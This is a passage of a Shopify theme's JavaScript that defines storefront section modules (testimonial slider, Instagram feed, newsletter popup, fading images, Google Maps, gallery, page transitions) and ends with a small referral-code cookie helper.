                theme.parallaxSections[this.namespace] = new theme.Parallax($parallaxContainer, args);
            }
        }

        backgroundImage.prototype = $.extend({}, backgroundImage.prototype, {
            onUnload: function(evt) {
                theme.parallaxSections[this.namespace].destroy();
                delete theme.parallaxSections[this.namespace];
            }
        });

        return backgroundImage;
    })();

    theme.Testimonials = (function() {
        var slideCount = 0;
        var defaults = {
            accessibility: true,
            arrows: false,
            dots: true,
            autoplay: false,
            touchThreshold: 20,
            slidesToShow: 3,
            slidesToScroll: 3
        };

        function Testimonials(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = $container.attr('data-section-id');
            var wrapper = this.wrapper = '.testimonials-wrapper';
            var slider = this.slider = '#Testimonials-' + sectionId;
            var $slider = jQuery(slider);

            this.sliderActive = false;
            var mobileOptions = $.extend({}, defaults, {
                slidesToShow: 1,
                slidesToScroll: 1,
                adaptiveHeight: true
            });

            slideCount = $slider.data('count');

            // Override slidesToShow/Scroll if there are not enough blocks
            if (slideCount < defaults.slidesToShow) {
                defaults.slidesToShow = slideCount;
                defaults.slidesToScroll = slideCount;
            }

            $slider.on('init', this.a11y.bind(this));

            if (theme.config.bpSmall) {
                this.init($slider, mobileOptions);
            } else {
                this.init($slider, defaults);
            }

            jQuery('body').on('matchSmall', function() {
                this.init($slider, mobileOptions);
            }.bind(this));

            jQuery('body').on('matchLarge', function() {
                this.init($slider, defaults);
            }.bind(this));
        }

        Testimonials.prototype = $.extend({}, Testimonials.prototype, {
            onUnload: function() {
                jQuery(this.slider, this.wrapper).slick('unslick');
            },

            onBlockSelect: function(evt) {
                // Ignore the cloned version
                var $slide = jQuery('.testimonials-slide--' + evt.detail.blockId + ':not(.slick-cloned)');
                var slideIndex = $slide.data('slick-index');

                // Go to selected slide, pause autoplay
                jQuery(this.slider, this.wrapper).slick('slickGoTo', slideIndex);
            },

            init: function(obj, args) {
                if (this.sliderActive) {
                    obj.slick('unslick');
                    this.sliderActive = false;
                }

                obj.slick(args);
                this.sliderActive = true;

                if (AOS) {
                    AOS.refresh();
                }
            },

            a11y: function(event, obj) {
                var $list = obj.$list;
                var $wrapper = jQuery(this.wrapper, this.$container);

                // Remove default Slick aria-live attr until slider is focused
                $list.removeAttr('aria-live');

                // When an element in the slider is focused set aria-live
                $wrapper.on('focusin', function(evt) {
                    if ($wrapper.has(evt.target).length) {
                        $list.attr('aria-live', 'polite');
                    }
                });

                // Remove aria-live
                $wrapper.on('focusout', function(evt) {
                    if ($wrapper.has(evt.target).length) {
                        $list.removeAttr('aria-live');
                    }
                });
            }
        });

        return Testimonials;
    })();

    theme.Instagram = (function() {
        function Instagram(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = $container.attr('data-section-id');
            var $target = jQuery('#Instafeed-' + sectionId);

            if (!$target.length) {
                return;
            }

            var userId = $target.data('user-id');
            var clientId = $target.data('client-id');
            var count = parseInt($target.data('count'));
            var gridItemWidth = $target.data('grid-item-width');

            // Ask for 2 more images than we'll actually show because
            // Instagram sometimes doesn't send enough
            var feed = this.feed = new Instafeed({
                target: $target[0],
                accessToken: clientId,
                get: 'user',
                userId: userId,
                limit: count + 2,
                template: '<div class="grid__item '+ gridItemWidth +'"><div class="image-wrap"><a href="{{link}}" target="_blank" style="background-image: url({{image}}); display: block; padding-bottom: 100%; background-size: cover; background-position: center;"></a></div></div>',
                resolution: 'standard_resolution'
            });

            feed.run();
        }

        Instagram.prototype = $.extend({}, Instagram.prototype, {
            onUnload: function() {

            }
        });

        return Instagram;
    })();


    theme.NewsletterPopup = (function() {
        function NewsletterPopup(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = $container.attr('data-section-id');
            this.cookieName = 'newsletter-' + sectionId;

            if (!$container.length) {
                return;
            }

            this.data = {
                secondsBeforeShow: $container.data('delay-seconds'),
                daysBeforeReappear: $container.data('delay-days'),
                cookie: $.cookie(this.cookieName),
                testMode: $container.data('test-mode')
            };

            this.modal = new theme.Modals('NewsletterPopup-' + sectionId, 'newsletter-popup-modal');

            // Open modal if errors or success message exist
            if ($container.find('.errors').length || $container.find('.note--success').length) {
                this.modal.open();
            }

            // Set cookie as opened if success message
            if ($container.find('.note--success').length) {
                this.closePopup(true);
                return;
            }

            jQuery('body').on('modalClose.' + $container.attr('id'), this.closePopup.bind(this));

            if (!this.data.cookie || this.data.testMode) {
                this.initPopupDelay();
            }
        }

        NewsletterPopup.prototype = $.extend({}, NewsletterPopup.prototype, {
            initPopupDelay: function() {
                setTimeout(function() {
                    this.modal.open();
                }.bind(this), this.data.secondsBeforeShow * 1000);
            },

            closePopup: function(success) {
                // Remove a cookie in case it was set in test mode
                if (this.data.testMode) {
                    $.removeCookie(this.cookieName, { path: '/' });
                    return;
                }

                var expiry = success ? 200 : this.data.daysBeforeReappear;

                $.cookie(this.cookieName, 'opened', { path: '/', expires: expiry });
            },

            onLoad: function() {
                this.modal.open();
            },

            onSelect: function() {
                this.modal.open();
            },

            onDeselect: function() {
                this.modal.close();
            },

            onUnload: function() {}
        });

        return NewsletterPopup;
    })();

    theme.FadingImages = (function() {

        var classes = {
            activeImage: 'active-image',
            finishedImage: 'finished-image',
            activeTitles: 'active-titles',
            finishedTitles: 'finished-titles',
            compensation: 'compensation'
        };

        function FadingImages(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = $container.attr('data-section-id');
            var namespace = this.namespace = '.fading-images-' + sectionId;

            if (!$container.length) {
                return;
            }

            var $imageContainer = $container.find('.fading-images');
            theme.loadImageSection($imageContainer);

            this.data = {
                isInit: false,
                interval: $container.data('interval'),
                block_count: $container.data('count'),
                finish_interval: 1000,
                timer_offset: 400,
                active_image: 1,
                active_title: 1,
                removed_compensation: false
            };

            this.selectors = {
                $allTitles: $container.find('.fading-images-overlay__titles')
            };

            this.checkVisibility();
            jQuery(window).on('scroll' + this.namespace, $.throttle(100, this.checkVisibility.bind(this)));
        }

        FadingImages.prototype = $.extend({}, FadingImages.prototype, {
            checkVisibility: function() {
                if (this.data.isInit) {
                    jQuery(window).off('scroll' + this.namespace);
                    return;
                }

                if (theme.isElementVisible(this.$container)) {
                    this.startImages();
                    this.startTitles();
                    this.data.isInit = true;
                }
            },

            nextImage: function() {
                var $container = this.$container;

                if (!this.data.removed_compensation) {
                    $container.find('.fading-images__item[data-slide-index=' + this.data.active_image + ']').removeClass(classes.compensation);
                    this.data.removed_compensation = true;
                }

                $container
                    .find('.fading-images__item[data-slide-index=' + this.data.active_image + ']')
                    .removeClass(classes.activeImage)
                    .addClass(classes.finishedImage);

                var target_image = this.data.active_image;
                window.setTimeout(function() {
                    $container.find('.fading-images__item[data-slide-index=' + target_image + ']').removeClass(classes.finishedImage);
                }, this.data.finish_interval);

                this.data.active_image++;
                if (this.data.active_image > this.data.block_count) {
                    this.data.active_image = 1;
                }

                $container.find('.fading-images__item[data-slide-index=' + this.data.active_image + ']').addClass(classes.activeImage);
            },

            nextTitle: function() {
                var $container = this.$container;
                var $allTitles = this.selectors.$allTitles;

                this.selectors.$allTitles.removeClass(classes.activeTitles).addClass(classes.finishedTitles);

                this.data.active_title++;
                if (this.data.active_title > this.data.block_count) {
                    this.data.active_title = 1;
                }

                var target_title = this.data.active_title;
                window.setTimeout(function() {
                    var newText1 = $container.find('.fading-images__item[data-slide-index=' + target_title + ']').attr('data-slide-title1');
                    var newText2 = $container.find('.fading-images__item[data-slide-index=' + target_title + ']').attr('data-slide-title2');
                    $container.find('.fading-images-overlay__title--1').text(newText1);
                    $container.find('.fading-images-overlay__title--2').text(newText2);
                    $allTitles.removeClass(classes.finishedTitles).addClass(classes.activeTitles);
                }, this.data.finish_interval - 200);
            },

            startImages: function() {
                // Prep and show first image
                this.$container.find('.fading-images__item[data-slide-index=' + this.data.active_image + ']').addClass(classes.activeImage).addClass(classes.compensation);

                // Begin timer
                var o = this;
                window.setTimeout(function() {
                    var fading_images_timer = window.setInterval(o.nextImage.bind(o), o.data.interval);
                }, this.data.timer_offset);
            },

            startTitles: function() {
                var $container = this.$container;
                var $allTitles = this.selectors.$allTitles;
                // Prep and show first titles
                var target_title = this.data.active_title;
                window.setTimeout(function() {
                    var newText1 = $container.find('.fading-images__item[data-slide-index=' + target_title + ']').attr('data-slide-title1');
                    var newText2 = $container.find('.fading-images__item[data-slide-index=' + target_title + ']').attr('data-slide-title2');
                    $container.find('.fading-images-overlay__title--1').text(newText1);
                    $container.find('.fading-images-overlay__title--2').text(newText2);
                    $allTitles.addClass(classes.activeTitles);
                }, 750);

                // Begin timer
                var fading_titles_timer = window.setInterval(this.nextTitle.bind(this), this.data.interval);
            },

            onUnload: function() {
                jQuery(window).off('scroll' + this.namespace);
            }
        });

        return FadingImages;
    })();

    theme.Maps = (function() {
        var config = {
            zoom: 14
        };
        var apiStatus = null;
        var mapsToLoad = [];

        var errors = {
            addressNoResults: theme.strings.addressNoResults,
            addressQueryLimit: theme.strings.addressQueryLimit,
            addressError: theme.strings.addressError,
            authError: theme.strings.authError
        };

        var selectors = {
            section: '[data-section-type="map"]',
            map: '[data-map]',
            mapOverlay: '[data-map-overlay]'
        };

        var classes = {
            mapError: 'map-section--load-error',
            errorMsg: 'map-section__error errors text-center'
        };

        // Global function called by Google on auth errors.
        // Show an auto error message on all map instances.
        window.gm_authFailure = function() {
            if (!Shopify.designMode) {
                return;
            }

            jQuery(selectors.section).addClass(classes.mapError);
            jQuery(selectors.map).remove();
            jQuery(selectors.mapOverlay).after(
                '<div class="' +
                classes.errorMsg +
                '">' +
                theme.strings.authError +
                '</div>'
            );
        };

        function Map(container) {
            this.$container = jQuery(container);
            this.sectionId = this.$container.attr('data-section-id');
            this.namespace = '.map-' + this.sectionId;
            this.$map = this.$container.find(selectors.map);
            this.key = this.$map.data('api-key');

            if (!this.key) {
                return;
            }

            // Lazyload API
            this.checkVisibility();
            jQuery(window).on('scroll' + this.namespace, $.throttle(50, this.checkVisibility.bind(this)));
        }

        function initAllMaps() {
            // API has loaded, load all Map instances in queue
            $.each(mapsToLoad, function(index, instance) {
                instance.createMap();
            });
        }

        function geolocate($map) {
            var deferred = $.Deferred();
            var geocoder = new google.maps.Geocoder();
            var address = $map.data('address-setting');

            geocoder.geocode({ address: address }, function(results, status) {
                if (status !== google.maps.GeocoderStatus.OK) {
                    deferred.reject(status);
                }

                deferred.resolve(results);
            });

            return deferred;
        }

        Map.prototype = $.extend({}, Map.prototype, {
            prepMapApi: function() {
                if (apiStatus === 'loaded') {
                    this.createMap();
                } else {
                    mapsToLoad.push(this);

                    if (apiStatus !== 'loading') {
                        apiStatus = 'loading';
                        if (typeof window.google === 'undefined') {
                            $.getScript(
                                'https://maps.googleapis.com/maps/api/js?key=' + this.key
                            ).then(function() {
                                apiStatus = 'loaded';
                                initAllMaps();
                            });
                        }
                    }
                }
            },

            createMap: function() {
                var $map = this.$map;

                return geolocate($map)
                    .then(
                        function(results) {
                            var mapOptions = {
                                zoom: config.zoom,
                                backgroundColor: 'none',
                                center: results[0].geometry.location,
                                draggable: false,
                                clickableIcons: false,
                                scrollwheel: false,
                                disableDoubleClickZoom: true,
                                disableDefaultUI: true
                            };

                            var map = (this.map = new google.maps.Map($map[0], mapOptions));
                            var center = (this.center = map.getCenter());

                            var marker = new google.maps.Marker({
                                map: map,
                                position: map.getCenter()
                            });

                            google.maps.event.addDomListener(
                                window,
                                'resize',
                                $.debounce(250, function() {
                                    google.maps.event.trigger(map, 'resize');
                                    map.setCenter(center);
                                    $map.removeAttr('style');
                                })
                            );
                        }.bind(this)
                    )
                    .fail(function() {
                        var errorMessage;

                        switch (status) {
                            case 'ZERO_RESULTS':
                                errorMessage = errors.addressNoResults;
                                break;
                            case 'OVER_QUERY_LIMIT':
                                errorMessage = errors.addressQueryLimit;
                                break;
                            case 'REQUEST_DENIED':
                                errorMessage = errors.authError;
                                break;
                            default:
                                errorMessage = errors.addressError;
                                break;
                        }

                        // Show errors only to merchant in the editor.
                        if (Shopify.designMode) {
                            $map
                                .parent()
                                .addClass(classes.mapError)
                                .html(
                                    '<div class="' +
                                    classes.errorMsg +
                                    '">' +
                                    errorMessage +
                                    '</div>'
                                );
                        }
                    });
            },

            checkVisibility: function() {
                if (theme.isElementVisible(this.$container, 600)) {
                    this.prepMapApi();
                    jQuery(window).off(this.namespace);
                }
            },

            onUnload: function() {
                if (this.$map.length === 0) {
                    return;
                }
                // Causes a harmless JS error when a section without an active map is reloaded
                google.maps.event.clearListeners(this.map, 'resize');
            }
        });

        return Map;
    })();

    theme.Blog = (function() {

        function Blog(container) {
            this.tagFilters();
        }

        Blog.prototype = $.extend({}, Blog.prototype, {
            tagFilters: function() {
                var $filterBy = jQuery('#BlogTagFilter');

                if (!$filterBy.length) {
                    return;
                }

                $filterBy.on('change', function() {
                    location.href = jQuery(this).val();
                });
            },

            onUnload: function() {

            }
        });

        return Blog;
    })();

    theme.Photoswipe = (function() {
        var selectors = {
            photoswipeImg: '.photoswipe__image'
        }

        function Photoswipe(container) {
            var $container = this.$container = jQuery(container);
            var sectionId = $container.attr('data-section-id');
            this.namespace = '.photoswipe-' + this.sectionId;
            var $images = this.$images = $container.find(selectors.photoswipeImg);
            this.gallery;

            if (!$container.length) {
                return;
            }

            this.init();
        }

        Photoswipe.prototype = $.extend({}, Photoswipe.prototype, {
            init: function() {
                var haveImages = false;
                var items = [];
                var options = {};

                this.$images.each(function() {
                    var haveImages = true;
                    var smallSrc = jQuery(this).prop('currentSrc') || jQuery(this).prop('src');
                    var item = {
                        msrc: smallSrc,
                        src: jQuery(this).data('photoswipe-src'),
                        w: jQuery(this).data('photoswipe-width'),
                        h: jQuery(this).data('photoswipe-height'),
                        el: jQuery(this)[0]
                    };

                    items.push(item);
                });

                this.$images.on('click' + this.namespace, function(evt) {
                    index = jQuery(evt.currentTarget).data('index');
                    this.initGallery(items, index);
                }.bind(this));
            },

            initGallery: function(items, index) {
                var pswpElement = document.querySelectorAll('.pswp')[0];

                var options = {
                    history: false,
                    index: index - 1,
                    getThumbBoundsFn: function(index) {
                        var pageYScroll = window.pageYOffset || document.documentElement.scrollTop;
                        var thumbnail = items[index].el;
                        var rect = thumbnail.getBoundingClientRect();
                        return {x:rect.left, y:rect.top + pageYScroll, w:rect.width};
                    }
                }

                this.gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, options);
                this.gallery.init();
            },

            onUnload: function() {
                this.$images.off('click' + this.namespace);
                this.gallery.destroy()
            }
        });

        return Photoswipe;
    })();



    theme.config = {
        bpSmall: false,
        hasSessionStorage: true,
        mediaQuerySmall: 'screen and (max-width: 767px)',
        mediaQueryMediumUp: 'screen and (min-width: 768px)',
        youTubeReady: false,
        vimeoReady: false,
        vimeoLoading: false,
        isTouch: ('ontouchstart' in window) || window.DocumentTouch && window.document instanceof DocumentTouch || window.navigator.maxTouchPoints || window.navigator.msMaxTouchPoints ? true : false,
        isIpad: /ipad/.test(window.navigator.userAgent.toLowerCase()),
        stickyHeader: false,
        recentlyViewed: []
    };

    if (theme.config.isIpad) {
        document.documentElement.className += ' js-ipad';
    }

    theme.recentlyViewed = {
        recent: {}, // will store handle+url of recent products
        productInfo: {} // will store product data to reduce API calls
    };

    window.onYouTubeIframeAPIReady = function() {
        theme.config.youTubeReady = true;
        jQuery('body').trigger('youTubeReady');
    }

    window.loadYouTube = function() {
        if (theme.config.youtubeReady) {
            return;
        }

        var tag = document.createElement('script');
        tag.src = "https://www.youtube.com/iframe_api";
        var firstScriptTag = document.getElementsByTagName('script')[0];
        firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
    }

    window.loadVimeo = function() {
        if (theme.config.vimeoLoading) {
            return;
        }

        if (!theme.config.vimeoReady) {
            theme.config.vimeoLoading = true;
            var tag = document.createElement('script');
            tag.src = "https://player.vimeo.com/api/player.js";
            var firstScriptTag = document.getElementsByTagName('script')[0];
            firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);

            // Because there's no way to check for the Vimeo API being loaded
            // asynchronously, we use this terrible timeout to wait for it being ready
            checkIfVimeoIsReady()
                .then(function() {
                    theme.config.vimeoReady = true;
                    theme.config.vimeoLoading = false;
                    jQuery('body').trigger('vimeoReady');
                })
                .fail(function() {
                    // No vimeo API to talk to
                });
        }
    }

    function checkIfVimeoIsReady() {
        var deferred = $.Deferred();
        var wait;
        var timeout;

        wait = setInterval(function() {
            if (!Vimeo) {
                return;
            }

            clearInterval(wait);
            clearTimeout(timeout);
            deferred.resolve();
        }, 500);

        timeout = setTimeout(function() {
            clearInterval(wait);
            deferred.reject();
        }, 4000); // subjective. test up to 8 times over 4 seconds

        return deferred;
    }

    theme.init = function() {
        theme.setGlobals();
        theme.pageTransitions();
        theme.collectionTemplate.init();
        theme.initQuickShop();
        theme.videoModal();
        theme.backButton.init();
        theme.customerTemplates.init();
        theme.collapsibles.init();

        slate.rte.wrapTable();
        slate.rte.wrapVideo();

        AOS.init({
            easing: 'ease-out-quad',
            once: true,
            offset: 60,
            disableMutationObserver: true
        });

        jQuery(document.documentElement).on('keyup.tab', function(evt) {
            if (evt.keyCode === 9) {
                jQuery(document.documentElement).addClass('tab-outline');
                jQuery(document.documentElement).off('keyup.tab');
            }
        });

        // Change email icon to submit text
        jQuery('.footer__newsletter-input').on('keyup', function() {
            jQuery(this).addClass('footer__newsletter-input--active');
        });
    };

    theme.setGlobals = function() {
        theme.config.hasSessionStorage = theme.isSessionStorageSupported();
        theme.recentlyViewed.handleCookie = $.cookie('theme-recent');
        if (theme.recentlyViewed.handleCookie) {
            theme.recentlyViewed.recent = JSON.parse(theme.recentlyViewed.handleCookie);
        }

        theme.recentlyViewed.productInfo = theme.config.hasSessionStorage && sessionStorage['recent-products'] ? JSON.parse(sessionStorage['recent-products']) : {};

        if (theme.config.isTouch) {
            jQuery('body').addClass('supports-touch');
        }

        enquire.register(theme.config.mediaQuerySmall, {
            match: function() {
                theme.config.bpSmall = true;
                jQuery('body').trigger('matchSmall');
            },
            unmatch: function() {
                theme.config.bpSmall = false;
                jQuery('body').trigger('unmatchSmall');
            }
        });

        enquire.register(theme.config.mediaQueryMediumUp, {
            match: function() {
                jQuery('body').trigger('matchLarge');
            },
            unmatch: function() {
                jQuery('body').trigger('unmatchLarge');
            }
        });
    };

    theme.loadImageSection = function($container) {
        // Wait until images inside container have lazyloaded class
        function setAsLoaded() {
            $container.removeClass('loading loading--delayed').addClass('loaded');
        }

        function checkForLazyloadedImage() {
            return $container.find('.lazyloaded').length;
        }

        // If it has SVGs it's in the onboarding state so set as loaded
        if ($container.find('svg').length) {
            setAsLoaded();
            return;
        };

        if (checkForLazyloadedImage() > 0) {
            setAsLoaded();
            return;
        }

        var interval = setInterval(function() {
            if (checkForLazyloadedImage() > 0) {
                clearInterval(interval);
                setAsLoaded();
            }
        }, 80);
    }

    theme.isSessionStorageSupported = function() {
        // Return false if we are in an iframe without access to sessionStorage
        if (window.self !== window.top) {
            return false;
        }

        var testKey = 'test';
        var storage = window.sessionStorage;
        try {
            storage.setItem(testKey, '1');
            storage.removeItem(testKey);
            return true;
        } catch (error) {
            return false;
        }
    };

    theme.isElementVisible = function($el, threshold) {
        var rect = $el[0].getBoundingClientRect();
        var windowHeight = window.innerHeight || document.documentElement.clientHeight;
        threshold = threshold ? threshold : 0;

        return (
            rect.bottom >= 0 &&
            rect.right >= 0 &&
            rect.top <= (windowHeight + threshold) &&
            rect.left <= (window.innerWidth || document.documentElement.clientWidth)
        );
    };

    theme.pageTransitions = function() {
        if (jQuery('body').data('transitions') == true) {
            var namespace = '.page-transition';

            // Hack test to fix Safari page cache issue.
            // window.onpageshow doesn't always run when navigating
            // back to the page, so the unloading class remains, leaving
            // a white page. Setting a timeout to remove that class when leaving
            // the page actually finishes running when they come back.
            if (!!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/)) {
                jQuery('a').off(namespace).on('click' + namespace, function() {
                    window.setTimeout(function() {
                        jQuery('body').removeClass('unloading');
                    }, 1200);
                });
            }

            // Add disable transition class to malito, anchor, and YouTube links
            jQuery('a[href^="mailto:"], a[href^="#"], a[target="_blank"], a[href*="youtube.com/watch"], a[href*="youtu.be/"]').each(function() {
                jQuery(this).addClass('js-no-transition');
            });

            jQuery('a:not(.js-no-transition)').off(namespace).on('click' + namespace, function(evt) {
                if (evt.metaKey) return true;
                evt.preventDefault();
                jQuery('body').addClass('unloading');
                var src = jQuery(this).attr('href');
                window.setTimeout(function() {
                    location.href = src;
                }, 50);
            });

            // iOS caches the page state, so close the drawer when navigating away
            jQuery('a.mobile-nav__link').off(namespace).on('click' + namespace, function() {
                theme.NavDrawer.close();
            });
        }
    };

    theme.reinitSection = function(section) {
        for (var i = 0; i < sections.instances.length; i++) {
            var instance = sections.instances[i];
            if (instance['type'] === section) {
                if (typeof instance.forceReload === 'function') {
                    instance.forceReload();
                }
            }
        }
    }

    window.onpageshow = function(evt) {
        // Removes unload class when returning to page via history
        if (evt.persisted) {
            jQuery('body').removeClass('unloading');
        }
    };

    jQuery(document).ready(function() {
        theme.init();

        window.sections = new theme.Sections();
        sections.register('header-section', theme.HeaderSection);
        sections.register('slideshow-section', theme.SlideshowSection);
        sections.register('video-section', theme.VideoSection);
        sections.register('background-image', theme.BackgroundImage);
        sections.register('recently-viewed', theme.RecentlyViewed);
        sections.register('product', theme.Product);
        sections.register('product-template', theme.Product);
        sections.register('collection-header', theme.CollectionHeader);
        sections.register('collection-sidebar', theme.CollectionSidebar);
        sections.register('collection-template', theme.Collection);
        sections.register('featured-content-section', theme.FeaturedContentSection);
        sections.register('testimonials', theme.Testimonials);
        sections.register('instagram', theme.Instagram);
        sections.register('newsletter-popup', theme.NewsletterPopup);
        sections.register('fading-images', theme.FadingImages);
        sections.register('map', theme.Maps);
        sections.register('blog', theme.Blog);
        sections.register('photoswipe', theme.Photoswipe);
    });
})(theme.jQuery);

// Ref code functionality

function getParameterByName(name, url = window.location.href) {
  name = name.replace(/[\[\]]/g, '\\$&');
  var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
    results = regex.exec(url);
  if (!results) return null;
  if (!results[2]) return '';
  return decodeURIComponent(results[2].replace(/\+/g, ' '));
}

function setCookie(cname, cvalue, exdays) {
  const d = new Date();
  d.setTime(d.getTime() + (exdays*24*60*60*1000));
  let expires = "expires="+ d.toUTCString();
  document.cookie = cname + "=" + cvalue + ";" + expires + ";path=/";
}

function getCookie(cname) {
  let name = cname + "=";
  let decodedCookie = decodeURIComponent(document.cookie);
  let ca = decodedCookie.split(';');
  for(let i = 0; i <ca.length; i++) {
    let c = ca[i];
    while (c.charAt(0) == ' ') {
      c = c.substring(1);
    }
    if (c.indexOf(name) == 0) {
      return c.substring(name.length, c.length);
    }
  }
  return null;
}

jQuery(document).ready(function() {
  	let queryParameter = getParameterByName('refId');
  
    if(queryParameter){
	   // Set cookie 
       setCookie('refId' , queryParameter , 30);
    }  
});